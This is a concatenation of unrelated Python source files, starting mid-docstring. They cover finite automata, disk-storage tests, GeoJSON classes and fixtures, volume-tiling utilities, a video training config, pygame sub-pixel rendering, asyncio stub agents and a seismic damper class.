when needed, by default False.
Returns
-------
Automata
The concatenated automata.
Raises
------
ValueError
If the current automata has multiple end states and ``set_single`` is
False.
ValueError
If the other automata has multiple start states and ``set_single`` is
False.
"""
if len(self.end_states) != 1:
if set_single:
self.set_single_end()
else:
raise ValueError(f"Automata {self.name} has multiple end states.")
if len(other.start_states) != 1:
if set_single:
other.set_single_start()
else:
raise ValueError(f"Automata {other.name} has multiple start states.")
other = other.flat()
other_first_state = other.start_state
other_last_state = other.end_state
self.end_state.merge(other_first_state)
if other_last_state == other_first_state:
other_last_state = self.end_state
for state in other.states.values():
for trans in state.transitions:
if trans.to_state is other_first_state:
trans.to_state = self.end_state
self.end_states = [other_last_state]
return self
@property
def pos(self) -> int:
"""Position of the automata on the input"""
return self._pos
@property
def start_state(self) -> State:
"""Get the start state of the automata."""
if len(self.start_states) == 1:
return self.start_states[0]
raise ValueError("The automata has multiple start states.")
@property
def end_state(self) -> State:
"""Get the end state of the automata."""
if len(self.end_states) == 1:
return self.end_states[0]
raise ValueError("The automata has multiple end states.")
def add_state(
self,
state: Union[str, State] = None,
start: bool = False,
end: bool = False,
name: str = None,
) -> State:
"""
Add a state to the automata.
Parameters
----------
state : Union[str, State]
The name of the state to add or the state itself.
start : bool
Whether the state is a start state.
end : bool
Whether the state is an end state.
Returns
-------
State
The added state.
"""
if state is None:
state = State(f"q{len(self.states)}")
if isinstance(state, str):
if state in self.states:
raise ValueError(f"State {state} already exists.")
state = State(state)
state.automata = self
name = name if name is not None else state.name
self.states[name] = state
if start:
self.start_states.append(state)
if end:
self.end_states.append(state)
return state
def add_transition(
self,
from_state: Union[str, State],
to_state: Union[str, State],
condition: Any = None,
action: int = None,
negated: bool = False,
) -> None:
"""
Add a transition to the automata.
Parameters
----------
from_state : Union[str, State]
The state from which the transition starts.
to_state : Union[str, State]
The state to which the transition goes.
condition : Any
The condition under which the transition is taken.
action : int
The action to perform when the transition is taken.
Raises
------
ValueError
If any of the states does not exist.
"""
if isinstance(from_state, str):
from_state = self.states.get(from_state, None)
if from_state is None:
raise ValueError(f"No state {from_state} defined.")
if isinstance(to_state, str):
to_state = self.states.get(to_state, None)
if to_state is None:
raise ValueError(f"No state {to_state} defined.")
if action is None:
action = 0 if condition is None else 1
transition = Transition(from_state, to_state, condition, action, negated)
from_state.transitions.append(transition)
return transition
def set_single_start(self) -> State:
"""
Set the automata to have a single start state.
Returns
-------
State
The start state.
"""
if len(self.start_states) == 1:
return self.start_states[0]
start_st = self.add_state(f"_start_{self.name}")
for state in self.start_states:
self.add_transition(start_st, state)
self.start_states = [start_st]
return start_st
def set_single_end(self) -> State:
"""
Set the automata to have a single end state.
Returns
-------
State
The end state.
"""
if len(self.end_states) == 1:
return self.end_states[0]
end_st = self.add_state(f"_end_{self.name}")
for state in self.end_states:
self.add_transition(state, end_st)
self.end_states = [end_st]
return end_st
def set_single_start_end(self) -> Tuple[State, State]:
"""
Set the automata to have a single start and end state.
Returns
-------
Tuple[State, State]
The start and end state.
"""
start_st = self.set_single_start()
end_st = self.set_single_end()
return start_st, end_st
def flat(self) -> Automata:
"""
Flatten the automata.
Returns
-------
Automata
The flattened automata.
"""
flat = Automata(self.name)
count = 0
visited_states = []
non_visited_states = self.start_states
while non_visited_states:
new_non_visited_states = []
for state in non_visited_states:
flat.add_state(
state,
state in self.start_states,
state in self.end_states,
name=f"q{count}",
)
state.name = f"q{count}"
count += 1
visited_states.append(state)
for transition in state.transitions:
to_state = transition.to_state
if (
to_state not in visited_states
and to_state not in new_non_visited_states
and to_state not in non_visited_states
):
new_non_visited_states.append(transition.to_state)
non_visited_states = new_non_visited_states
return flat
def show(self) -> None:
"""
Show the automata.
"""
# Inverse name states dict
inv_states = {v: k for k, v in self.states.items()}
for name, state in self.states.items():
print(name, f"Final: {state in self.end_states}")
for transition in state.transitions:
neg = "^" if transition.negated else ""
print(
f" ({neg}{transition.str_cond}) "
f"-> {inv_states[transition.to_state]}"
)
def _eps_closure_single(self, state: Union[str, State]) -> Set[State]:
"""
Compute the epsilon closure of a single state.
Parameters
----------
state : Union[str, State]
The state to compute the epsilon closure of.
Returns
-------
Set[State]
The epsilon closure of the state.
Raises
------
ValueError
If the state does not exist.
"""
if isinstance(state, str):
if state not in self.states:
raise ValueError(f"No state {state} defined.")
state = self.states[state]
visited = set()
non_vsited = [state]
while non_vsited:
new_non_vsited = []
for current_state in non_vsited:
visited.add(current_state)
for transition in current_state.transitions:
if transition.is_epsilon:
to_st = transition.to_state
if (
to_st not in visited
and to_st not in new_non_vsited
and to_st not in non_vsited
):
new_non_vsited.append(to_st)
non_vsited = new_non_vsited
return visited
def eps_closure(
self, state: Union[str, State, Iterable[str], Iterable[State]]
) -> Set[State]:
"""
Compute the epsilon closure of a state or a set of states.
Parameters
----------
state : Union[str, State, Iterable[str], Iterable[State]]
The state or a list of states.
Returns
-------
Set[State]
The epsilon closure of the state or a set of states.
Raises
------
ValueError
If any of the states does not exist.
"""
if isinstance(state, (str, State)):
return self._eps_closure_single(state)
whole_closure = set()
for current_state in state:
whole_closure.update(self._eps_closure_single(current_state))
return whole_closure
def _goto_single(self, state: Union[str, State], symbol: str) -> Set[State]:
"""
Compute the goto of a single state.
Parameters
----------
state : Union[str, State]
The state to compute the goto of.
symbol : str
The symbol to compute the goto of.
Returns
-------
Set[State]
The goto of the state.
Raises
------
ValueError
If the state does not exist.
"""
if isinstance(state, str):
if state not in self.states:
raise ValueError(f"No state {state} defined.")
state = self.states[state]
answer = set()
st_esp_closure = self.eps_closure(state)
for current_state in st_esp_closure:
for transition in current_state.transitions:
if not transition.is_epsilon and transition.check_condition(symbol):
answer.add(transition.to_state)
return answer
def goto(
self, state: Union[str, State, Iterable[str], Iterable[State]], symbol: str
) -> Set[State]:
"""
Compute the goto of a state or a set of states.
Parameters
----------
state : Union[str, State, Iterable[str], Iterable[State]]
The state or a list of states.
symbol : str
The symbol to compute the goto of.
Returns
-------
Set[State]
The goto of the state or a set of states.
Raises
------
ValueError
If any of the states does not exist.
"""
if isinstance(state, (str, State)):
return self._goto_single(state, symbol)
whole_goto = set()
for current_state in state:
whole_goto.update(self._goto_single(current_state, symbol))
return whole_goto
def to_dfa(self, dfa2nfa: bool = False) -> Union[Automata, Tuple[Automata, Dict]]:
"""
Convert the automata to a DFA.
Parameters
----------
dfa2nfa : bool
If True, the return value will be a tuple of the DFA and the dfa2nfa
dictionary, otherwise only the DFA will be returned. By default, False.
Returns
-------
Union[Automata, Tuple[Automata, Dict]]
The DFA.
"""
get_name = lambda states: "".join(sorted(x.name for x in states))
alphabet = self.alphabet
dfa = Automata(self.name)
start_state = self.eps_closure(self.start_states)
start_name = get_name(start_state)
q_0 = dfa.add_state(start_name, start=True, end=start_state in self.end_states)
dfa_to_nfa = {q_0: start_state}
visited = set()
non_visited = [q_0]
while non_visited:
new_non_visited = []
for current_state in non_visited:
if current_state in visited:
continue
visited.add(current_state)
for char in alphabet:
goto_states = self.goto(dfa_to_nfa[current_state], char)
if not goto_states:
continue
next_state = self.eps_closure(goto_states)
next_name = get_name(next_state)
if next_name not in dfa.states:
dfa_state = dfa.add_state(
next_name,
end=any(s in self.end_states for s in next_state),
)
dfa_to_nfa[dfa_state] = next_state
new_non_visited.append(dfa_state)
else:
dfa_state = dfa.states[next_name]
dfa.add_transition(current_state.name, next_name, char)
if next_state not in new_non_visited and next_state not in visited:
new_non_visited.append(dfa_state)
non_visited = new_non_visited
return dfa if not dfa2nfa else (dfa, dfa_to_nfa)
def run(
self,
input_: Iterable,
stop_at_end: bool = False,
) -> bool:
"""
Run the automata on the given input.
Parameters
----------
input_ : Iterable
The input to run the automata on.
stop_at_end : bool
Whether to stop the automata at the first end state encountered.
success_at_full_input : bool
Whether to consider the automata successful if the input is fully
consumed.
Returns
-------
bool
Whether the automata succeeded.
Raises
------
ValueError
If the automata has no start state.
"""
if not self.start_states:
raise ValueError("No start states defined.")
self._pos = 0
self._processes_idx = 0
self._input = input_
self._processes = [(st, self._pos) for st in self.start_states]
while self._processes:
stop = self._step()
if self._current_state in self.end_states:
if stop_at_end:
return True
if stop:
break
else:
return False
logging.debug(f"Final {self._processes_idx} {self._processes}")
return self._current_state in self.end_states
def _step(self):
self._current_state, self._pos = self._processes[self._processes_idx]
self._current_state.visited()
if self._pos > len(self._input):
self._processes.pop(self._processes_idx)
return False
new_processes = 0
logging.debug(f"{self._processes_idx} {self._processes}")
for transition in self._current_state.transitions:
if transition.is_epsilon or (
0 <= self._pos < len(self._input)
and transition.check_condition(self._input[self._pos])
):
run_state = (transition.to_state, self._pos + transition.action)
if new_processes == 0:
self._processes[self._processes_idx] = run_state
else:
self._processes.append(run_state)
new_processes += 1
if not new_processes:
self._processes.pop(self._processes_idx)
if self._processes:
self._processes_idx = (self._processes_idx + 1) % len(self._processes)
if self._pos >= len(self._input) or self._pos < 0:
return self._current_state in self.end_states
return False
| StarcoderdataPython |
3231747 | <reponame>Bystroushaak/BalancedDiscStorage
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
import os
import shutil
import os.path
import tempfile
from os.path import join
import pytest
from BalancedDiscStorage import BalancedDiscStorageZ
from test_balanced_disc_storage import data_file_context
# Variables ===================================================================
TEMP_DIR = None
# Fixtures ====================================================================
@pytest.fixture
def bdsz():
return BalancedDiscStorageZ(TEMP_DIR)
@pytest.fixture
def archive_file():
return data_file_context("archive.zip")
@pytest.fixture
def archive_file_hash():
return "b5770bf1233f932fb5d5729a07fc786e3040bcdbe528b70a4ad2cbc3b6eb2380_12d"
@pytest.fixture
def archive_file_path():
file_hash = archive_file_hash()
return join(TEMP_DIR, file_hash[0], file_hash) + "/"
@pytest.fixture
def archive_filenames():
return [
join(archive_file_path(), fn)
for fn in ["metadata.xml", "some.pdf"]
]
# Setup =======================================================================
def setup_module():
global TEMP_DIR
TEMP_DIR = tempfile.mkdtemp()
def teardown_module():
shutil.rmtree(TEMP_DIR)
# Tests =======================================================================
def test_init():
bdsz = BalancedDiscStorageZ(TEMP_DIR)
with pytest.raises(TypeError):
BalancedDiscStorageZ()
def test_add_archive_as_dir(bdsz, archive_file, archive_file_hash,
archive_file_path, archive_filenames):
bdsz.dir_limit = 20
assert not os.path.exists(archive_file_path)
bdsz.add_archive_as_dir(archive_file)
assert os.path.exists(archive_file_path)
assert os.path.isdir(archive_file_path)
for filename in archive_filenames:
assert os.path.exists(filename)
assert os.path.isfile(filename)
def test_add_archie_twice(bdsz, archive_file, archive_file_hash,
archive_file_path, archive_filenames):
bdsz.add_archive_as_dir(archive_file)
bdsz.add_archive_as_dir(archive_file)
assert os.path.exists(archive_file_path)
assert os.path.isdir(archive_file_path)
for filename in archive_filenames:
assert os.path.exists(filename)
assert os.path.isfile(filename)
def test_path_from_hash_for_zip(bdsz, archive_file_path, archive_file_hash):
assert bdsz.file_path_from_hash(archive_file_hash) == archive_file_path
def test_delete_by_file_zip(bdsz, archive_file, archive_file_path):
assert os.path.exists(archive_file_path)
assert os.path.isdir(archive_file_path)
bdsz.delete_by_file(archive_file)
assert not os.path.exists(archive_file_path)
assert not os.path.isdir(archive_file_path)
# check that blank directories are also cleaned
assert not os.path.exists(join(TEMP_DIR, "b"))
def test_too_many_zip_files(bdsz, archive_file):
bdsz.max_zipfiles = 1
with pytest.raises(ValueError):
bdsz.add_archive_as_dir(archive_file)
| StarcoderdataPython |
4821266 | from __future__ import unicode_literals
try:
import simplejson as json
except ImportError:
import json
from collections import MutableMapping
try:
import simplejson as json
except ImportError:
import json
import sys
from decimal import Decimal
mapping_base = MutableMapping
GEO_INTERFACE_MARKER = "__geo_interface__"
class GeoJSON(dict):
"""
A class representing a GeoJSON object.
"""
def __init__(self, iterable=(), **extra):
"""
Initialises a GeoJSON object
:param iterable: iterable from which to draw the content of the GeoJSON
object.
:type iterable: dict, array, tuple
:return: a GeoJSON object
:rtype: GeoJSON
"""
super(GeoJSON, self).__init__(iterable)
self["type"] = getattr(self, "type", type(self).__name__)
self.update(extra)
def __repr__(self):
return dumps(self, sort_keys=True)
__str__ = __repr__
def __getattr__(self, name):
"""
Permit dictionary items to be retrieved like object attributes
:param name: attribute name
:type name: str, int
:return: dictionary value
"""
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
"""
Permit dictionary items to be set like object attributes.
:param name: key of item to be set
:type name: str
:param value: value to set item to
"""
self[name] = value
def __delattr__(self, name):
"""
Permit dictionary items to be deleted like object attributes
:param name: key of item to be deleted
:type name: str
"""
del self[name]
@property
def __geo_interface__(self):
if self.type != "GeoJSON":
return self
@classmethod
def to_instance(cls, ob, default=None, strict=False):
"""Encode a GeoJSON dict into an GeoJSON object.
Assumes the caller knows that the dict should satisfy a GeoJSON type.
:param cls: Dict containing the elements to be encoded into a GeoJSON
object.
:type cls: dict
:param ob: GeoJSON object into which to encode the dict provided in
`cls`.
:type ob: GeoJSON
:param default: A default instance to append the content of the dict
to if none is provided.
:type default: GeoJSON
:param strict: Raise error if unable to coerce particular keys or
attributes to a valid GeoJSON structure.
:type strict: bool
:return: A GeoJSON object with the dict's elements as its constituents.
:rtype: GeoJSON.object
:raises TypeError: If the input dict contains items that are not valid
GeoJSON types.
:raises UnicodeEncodeError: If the input dict contains items of a type
that contain non-ASCII characters.
:raises AttributeError: If the input dict contains items that are not
valid GeoJSON types.
"""
if ob is None and default is not None:
instance = default()
elif isinstance(ob, GeoJSON):
instance = ob
else:
mapping = to_mapping(ob)
d = {}
for k in mapping:
d[k] = mapping[k]
try:
type_ = d.pop("type")
try:
type_ = str(type_)
except UnicodeEncodeError:
# If the type contains non-ascii characters, we can assume
# it's not a valid GeoJSON type
raise AttributeError("{0} is not a GeoJSON type".format(type_))
# geojson_factory = getattr(all, type_)
# if not issubclass(geojson_factory, GeoJSON):
# raise TypeError("""\
# Not a valid GeoJSON type:
# %r (geojson_factory: %r, cls: %r)
# """ % (type_, geojson_factory, cls))
# instance = geojson_factory(**d)
except (AttributeError, KeyError) as invalid:
if strict:
msg = "Cannot coerce %r into a valid GeoJSON structure: %s"
msg %= (ob, invalid)
raise ValueError(msg)
instance = ob
return instance
class Geometry(GeoJSON):
"""
Represents an abstract base class for a WGS84 geometry.
"""
if sys.version_info[0] == 3:
# Python 3.x has no long type
__JSON_compliant_types = (float, int, Decimal)
else:
__JSON_compliant_types = (float, int, Decimal, long) # noqa
def __init__(self, coordinates=None, crs=None, **extra):
"""
Initialises a Geometry object.
:param coordinates: Coordinates of the Geometry object.
:type coordinates: tuple
:param crs: CRS
:type crs: CRS object
"""
super(Geometry, self).__init__(**extra)
self["coordinates"] = coordinates or []
self.clean_coordinates(self["coordinates"])
if crs:
self["crs"] = self.to_instance(crs, strict=True)
@classmethod
def clean_coordinates(cls, coords):
for coord in coords:
if isinstance(coord, (list, tuple)):
cls.clean_coordinates(coord)
elif not isinstance(coord, cls.__JSON_compliant_types):
raise ValueError("%r is not JSON compliant number" % coord)
class GeometryCollection(GeoJSON):
"""
Represents an abstract base class for collections of WGS84 geometries.
"""
def __init__(self, geometries=None, **extra):
super(GeometryCollection, self).__init__(**extra)
self["geometries"] = geometries or []
# Marker classes.
class Point(Geometry):
pass
class MultiPoint(Geometry):
pass
class LineString(MultiPoint):
pass
class MultiLineString(Geometry):
pass
class Polygon(Geometry):
pass
class MultiPolygon(Geometry):
pass
class Default(object):
"""
GeoJSON default object.
"""
class Feature(GeoJSON):
"""
Represents a WGS84 GIS feature.
"""
def __init__(self, id=None, geometry=None, properties=None, **extra):
"""
Initialises a Feature object with the given parameters.
:param id: Feature identifier, such as a sequential number.
:type id: str, int
:param geometry: Geometry corresponding to the feature.
:param properties: Dict containing properties of the feature.
:type properties: dict
:return: Feature object
:rtype: Feature
"""
super(Feature, self).__init__(**extra)
if id is not None:
self["id"] = id
self["geometry"] = (self.to_instance(geometry, strict=True)
if geometry else None)
self["properties"] = properties or {}
class FeatureCollection(GeoJSON):
"""
Represents a FeatureCollection, a set of multiple Feature objects.
"""
def __init__(self, features, **extra):
"""
Initialises a FeatureCollection object from the
:param features: List of features to constitute the FeatureCollection.
:type features: list
:return: FeatureCollection object
:rtype: FeatureCollection
"""
super(FeatureCollection, self).__init__(**extra)
self["features"] = features
class GeoJSONEncoder(json.JSONEncoder):
def default(self, obj):
return GeoJSON.to_instance(obj)
# Wrap the functions from json, providing encoder, decoders, and
# object creation hooks.
# Here the defaults are set to only permit valid JSON as per RFC 4267
def _enforce_strict_numbers(obj):
if isinstance(obj, (int, float)):
raise ValueError("Number %r is not JSON compliant" % obj)
def dump(obj, fp, cls=GeoJSONEncoder, allow_nan=False, **kwargs):
return json.dump(to_mapping(obj),
fp, cls=cls, allow_nan=allow_nan, **kwargs)
def dumps(obj, cls=GeoJSONEncoder, allow_nan=False, **kwargs):
return json.dumps(to_mapping(obj),
cls=cls, allow_nan=allow_nan, **kwargs)
def load(fp,
cls=json.JSONDecoder,
parse_constant=_enforce_strict_numbers,
object_hook=GeoJSON.to_instance,
**kwargs):
return json.load(fp,
cls=cls, object_hook=object_hook,
parse_constant=parse_constant,
**kwargs)
def loads(s,
cls=json.JSONDecoder,
parse_constant=_enforce_strict_numbers,
object_hook=GeoJSON.to_instance,
**kwargs):
return json.loads(s,
cls=cls, object_hook=object_hook,
parse_constant=parse_constant,
**kwargs)
# Backwards compatibility
PyGFPEncoder = GeoJSONEncoder
def is_mapping(obj):
"""
Checks if the object is an instance of MutableMapping.
:param obj: Object to be checked.
:return: Truth value of whether the object is an instance of
MutableMapping.
:rtype: bool
"""
return isinstance(obj, MutableMapping)
def to_mapping(obj):
mapping = getattr(obj, GEO_INTERFACE_MARKER, None)
if mapping is not None:
return mapping
if is_mapping(obj):
return obj
if isinstance(obj, GeoJSON):
return dict(obj)
return json.loads(json.dumps(obj))
class CoordinateReferenceSystem(GeoJSON):
"""
Represents a CRS.
"""
def __init__(self, properties=None, **extra):
super(CoordinateReferenceSystem, self).__init__(**extra)
self["properties"] = properties or {}
class Named(CoordinateReferenceSystem):
"""
Represents a named CRS.
"""
def __init__(self, properties=None, **extra):
super(Named, self).__init__(properties=properties, **extra)
self["type"] = "name"
def __repr__(self):
return super(Named, self).__repr__()
class Linked(CoordinateReferenceSystem):
"""
Represents a linked CRS.
"""
def __init__(self, properties=None, **extra):
super(Linked, self).__init__(properties=properties, **extra)
self["type"] = "link"
class CrsDefault(object):
"""GeoJSON default, long/lat WGS84, is not serialized."""
ALL = ([Point, LineString, Polygon, MultiLineString, MultiPoint, MultiPolygon, GeometryCollection, Feature,
FeatureCollection, GeoJSON])
name = Named
link = Linked
| StarcoderdataPython |
3347917 | from __future__ import print_function, division
import numpy as np
import random
import torch
import os
# TODO: combine with data/misc/*.py
####################################################################
## Process image stacks.
####################################################################
def count_volume(data_sz, vol_sz, stride):
return 1 + np.ceil((data_sz - vol_sz) / stride.astype(float)).astype(int)
def crop_volume(data, sz, st=(0, 0, 0)): # C*D*W*H, C=1
st = np.array(st).astype(np.int32)
return data[st[0]:st[0]+sz[0], st[1]:st[1]+sz[1], st[2]:st[2]+sz[2]]
def crop_volume_mul(data, sz, st=(0, 0, 0)): # C*D*W*H, for multi-channel input
return data[:, st[0]:st[0]+sz[0], st[1]:st[1]+sz[1], st[2]:st[2]+sz[2]]
####################################################################
## Rebalancing.
####################################################################
def rebalance_binary_class(label, mask=None, base_w=1.0):
"""Binary-class rebalancing."""
weight_factor = label.float().sum() / torch.prod(torch.tensor(label.size()).float())
weight_factor = torch.clamp(weight_factor, min=1e-2)
alpha = 1.0
weight = alpha * label*(1-weight_factor)/weight_factor + (1-label)
return weight_factor, weight
####################################################################
## Affinitize.
####################################################################
def check_volume(data):
"""Ensure that data is a numpy 3D array."""
assert isinstance(data, np.ndarray)
if data.ndim == 2:
data = data[np.newaxis,...]
elif data.ndim == 3:
pass
elif data.ndim == 4:
assert data.shape[0]==1
data = np.reshape(data, data.shape[-3:])
else:
raise RuntimeError('data must be a numpy 3D array')
assert data.ndim==3
return data
# def affinitize(img, dst=(1,1,1), dtype=np.float32):
# """
# Transform segmentation to an affinity map.
# Args:
# img: 3D indexed image, with each index corresponding to each segment.
# Returns:
# ret: an affinity map (4D tensor).
# """
# img = check_volume(img)
# if ret is None:
# ret = np.zeros(img.shape, dtype=dtype)
# # Sanity check.
# (dz,dy,dx) = dst
# assert abs(dx) < img.shape[-1]
# assert abs(dy) < img.shape[-2]
# assert abs(dz) < img.shape[-3]
####################################################################
## tile to volume
####################################################################
def vast2Seg(seg):
# convert to 24 bits
return seg[:,:,0].astype(np.uint32)*65536+seg[:,:,1].astype(np.uint32)*256+seg[:,:,2].astype(np.uint32)
def tileToVolume(tiles, x0, x1, y0, y1, z0, z1, tile_sz, dt=np.uint8, tile_st=[0,0], tile_ratio=1, resize_order=1, ndim=1, black=128):
# x: column
# y: row
# no padding at the boundary
# st: starting index 0 or 1
result = np.zeros((z1-z0, y1-y0, x1-x0), dt)
c0 = x0 // tile_sz # floor
c1 = (x1 + tile_sz-1) // tile_sz # ceil
r0 = y0 // tile_sz
r1 = (y1 + tile_sz-1) // tile_sz
for z in range(z0, z1):
pattern = tiles[z]
for row in range(r0, r1):
for column in range(c0, c1):
if '{' in pattern:
path = pattern.format(row=row+tile_st[0], column=column+tile_st[1])
else:
path = pattern
if not os.path.exists(path):
#return None
patch = black*np.ones((tile_sz,tile_sz),dtype=dt)
else:
if path[-3:]=='tif':
import tifffile
patch = tifffile.imread(path)
else:
from imageio import imread
patch = imread(path)
if tile_ratio != 1:
# scipy.misc.imresize: only do uint8
from scipy.ndimage import zoom
patch = zoom(patch, [tile_ratio,tile_ratio,1], order=resize_order)
if patch.ndim==2:
patch=patch[:,:,None]
# last tile may not be full
xp0 = column * tile_sz
xp1 = xp0 + patch.shape[1]
#xp1 = (column+1) * tile_sz
yp0 = row * tile_sz
yp1 = yp0 + patch.shape[0]
#yp1 = (row + 1) * tile_sz
if patch is not None:
x0a = max(x0, xp0)
x1a = min(x1, xp1)
y0a = max(y0, yp0)
y1a = min(y1, yp1)
sz = result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0].shape
if resize_order==0: # label
if ndim==1: # 1-channel coding
result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0,0].reshape(sz)
else: # 3-channel coding
result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = vast2Seg(patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0]).reshape(sz)
else: # image
result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0].reshape(sz)
return result
| StarcoderdataPython |
3211939 | dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
syncbn = True
data = dict(
videos_per_gpu=4, # total batch size is 8Gpus*4 == 32
workers_per_gpu=4,
train=dict(
type='CtPDataset',
data_source=dict(
type='JsonClsDataSource',
ann_file='ucf101/annotations/train_split_1.json',
),
backend=dict(
type='ZipBackend',
zip_fmt='ucf101/zips/{}.zip',
frame_fmt='img_{:05d}.jpg',
),
frame_sampler=dict(
type='RandomFrameSampler',
num_clips=1,
clip_len=16,
strides=[1, 2, 3, 4, 5],
temporal_jitter=True
),
transform_cfg=[
dict(type='GroupScale', scales=[112, 128, 144]),
dict(type='GroupRandomCrop', out_size=112),
dict(type='GroupFlip', flip_prob=0.50),
dict(
type='PatchMask',
region_sampler=dict(
scales=[16, 24, 28, 32, 48, 64],
ratios=[0.5, 0.67, 0.75, 1.0, 1.33, 1.50, 2.0],
scale_jitter=0.18,
num_rois=3,
),
key_frame_probs=[0.5, 0.3, 0.2],
loc_velocity=3,
size_velocity=0.025,
label_prob=0.8
),
dict(type='RandomHueSaturation', prob=0.25, hue_delta=12, saturation_delta=0.1),
dict(type='DynamicBrightness', prob=0.5, delta=30, num_key_frame_probs=(0.7, 0.3)),
dict(type='DynamicContrast', prob=0.5, delta=0.12, num_key_frame_probs=(0.7, 0.3)),
dict(
type='GroupToTensor',
switch_rgb_channels=True,
div255=True,
mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225)
)
]
)
)
# optimizer
total_epochs = 300
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=40, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
step=[100, 200]
)
checkpoint_config = dict(interval=1, max_keep_ckpts=1, create_symlink=False)
workflow = [('train', 1)]
log_config = dict(
interval=10,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook'),
]
)
| StarcoderdataPython |
3227266 | <filename>stac_api_validator/geometries.py
point = {
"type": "Point",
"coordinates": [100.0, 0.0]
}
linestring = {
"type": "LineString",
"coordinates": [
[100.0, 0.0],
[101.0, 1.0]
]
}
polygon = {
"type": "Polygon",
"coordinates": [
[
[100.0, 0.0],
[101.0, 0.0],
[101.0, 1.0],
[100.0, 1.0],
[100.0, 0.0]
]
]
}
polygon_with_hole = {
"type": "Polygon",
"coordinates": [
[
[100.0, 0.0],
[101.0, 0.0],
[101.0, 1.0],
[100.0, 1.0],
[100.0, 0.0]
],
[
[100.8, 0.8],
[100.8, 0.2],
[100.2, 0.2],
[100.2, 0.8],
[100.8, 0.8]
]
]
}
multipoint = {
"type": "MultiPoint",
"coordinates": [
[100.0, 0.0],
[101.0, 1.0]
]
}
multilinestring = {
"type": "MultiLineString",
"coordinates": [
[
[100.0, 0.0],
[101.0, 1.0]
],
[
[102.0, 2.0],
[103.0, 3.0]
]
]
}
multipolygon = {
"type": "MultiPolygon",
"coordinates": [
[
[
[102.0, 2.0],
[103.0, 2.0],
[103.0, 3.0],
[102.0, 3.0],
[102.0, 2.0]
]
],
[
[
[100.0, 0.0],
[101.0, 0.0],
[101.0, 1.0],
[100.0, 1.0],
[100.0, 0.0]
],
[
[100.2, 0.2],
[100.2, 0.8],
[100.8, 0.8],
[100.8, 0.2],
[100.2, 0.2]
]
]
]
}
geometry_collection = {
"type": "GeometryCollection",
"geometries": [{
"type": "Point",
"coordinates": [100.0, 0.0]
}, {
"type": "LineString",
"coordinates": [
[101.0, 0.0],
[102.0, 1.0]
]
}]
}
| StarcoderdataPython |
1785229 | import asyncio
from . import Agent
class StubAgent(Agent):
def is_valid(self):
return True
async def process(self, event_fn):
event_fn(metric_f=1.0,
service="test",
tags=["test"])
class LaggingAgent(Agent):
def __init__(self, cfg, lag):
super(LaggingAgent, self).__init__(cfg)
self.lag = lag
def is_valid(self):
return True
async def process(self, event_fn):
await asyncio.sleep(self.lag)
event_fn(metric_f=1.0,
service="lagging_test",
tags=["test"])
| StarcoderdataPython |
4817901 | <reponame>duncanhawthorne/coffeeworlds
import pygame
from pygame.locals import *
from math import floor
# Try to import Numpy, or Numeric
try:
import numpy as Numeric
BYTE = "u1"
DWORD = "u4"
except ImportError:
try:
import Numeric
except ImportError, e:
print "Requires NumPy or Numeric!"
raise e
BYTE = Numeric.UnsignedInt8
DWORD = Numeric.Int32
class SubPixelSurface(object):
def __init__(self, surface, x_level=3, y_level=None):
"""Creates a sub pixel surface object.
surface -- A PyGame surface
x_level -- Number of sub-pixel levels in x
y_level -- Number of sub-pixel levels in y (same as x if omited)
"""
self.x_level = x_level
self.y_level = y_level or x_level
w, h = surface.get_size()
ow, oh = w, h
w += 2
h += 2
surf_array_rgb = Numeric.zeros((w, h, 3), BYTE)
surf_array_rgb[1:ow+1:, 1:oh+1:, ::] = pygame.surfarray.array3d(surface)
surf_array_a = Numeric.zeros((w, h), BYTE)
surf_array_a[1:ow+1:, 1:oh+1:] = pygame.surfarray.array_alpha(surface)
surf_array_rgb[0,::] = surf_array_rgb[1,::]
surf_array_rgb[::,0] = surf_array_rgb[::,1]
surf_array_rgb[w-1,::] = surf_array_rgb[w-2,::]
surf_array_rgb[::,h-1] = surf_array_rgb[::,h-2]
s = Numeric.zeros(surf_array_rgb.shape[:2]+(4,), DWORD)
s[::-1, ::, :3] = surf_array_rgb
s[::-1, ::, 3] = surf_array_a
x_steps = [float(n) / self.x_level for n in xrange(self.x_level)]
y_steps = [float(n) / self.y_level for n in xrange(self.y_level)]
self.surfaces = []
for frac_y in y_steps:
row = []
self.surfaces.append(row)
for frac_x in x_steps:
row.append( SubPixelSurface._generate(s, frac_x, frac_y) )
@staticmethod
def _generate(s, frac_x, frac_y):
frac_x, frac_y = frac_y, frac_x
frac_x = 1. - frac_x
sa = int( (1.-frac_x) * (1.-frac_y) * 255. )
sb = int( (1.-frac_x) * frac_y * 255. )
sc = int( frac_x * (1.-frac_y) * 255. )
sd = int( (frac_x * frac_y) * 255. )
a = s[ :-1:, :-1:] * sa
b = s[ 1::, :-1:] * sb
c = s[ :-1:, 1:: ] * sc
d = s[ 1::, 1:: ] * sd
a += b
a += c
a += d
a >>= 8
rgba_data = a.astype(BYTE).tostring()
pygame_surface = pygame.image.fromstring(rgba_data, a.shape[:2][::-1], "RGBA")
pygame_surface = pygame.transform.rotate(pygame_surface, 270)
return pygame_surface
def at(self, x, y):
"""Gets a sub-pixel surface for a given coordinate.
x -- X coordinate
y -- Y coordinate
"""
surf_x = int( (x - floor(x)) * self.x_level )
surf_y = int( (y - floor(y)) * self.y_level )
return self.surfaces[surf_y][surf_x]
| StarcoderdataPython |
89016 | <reponame>kakemotokeita/dqn-seismic-control<gh_stars>0
class Damper:
def __init__(self):
self.damper_force0 = 0
def d_damper_force(self, force, action):
damper_force = force * -action # AIが決定するパラメータで、与えられた力に対して、どんな割合で力を返すかを決める値
d_damper_force = damper_force - self.damper_force0
self.damper_force0 = damper_force
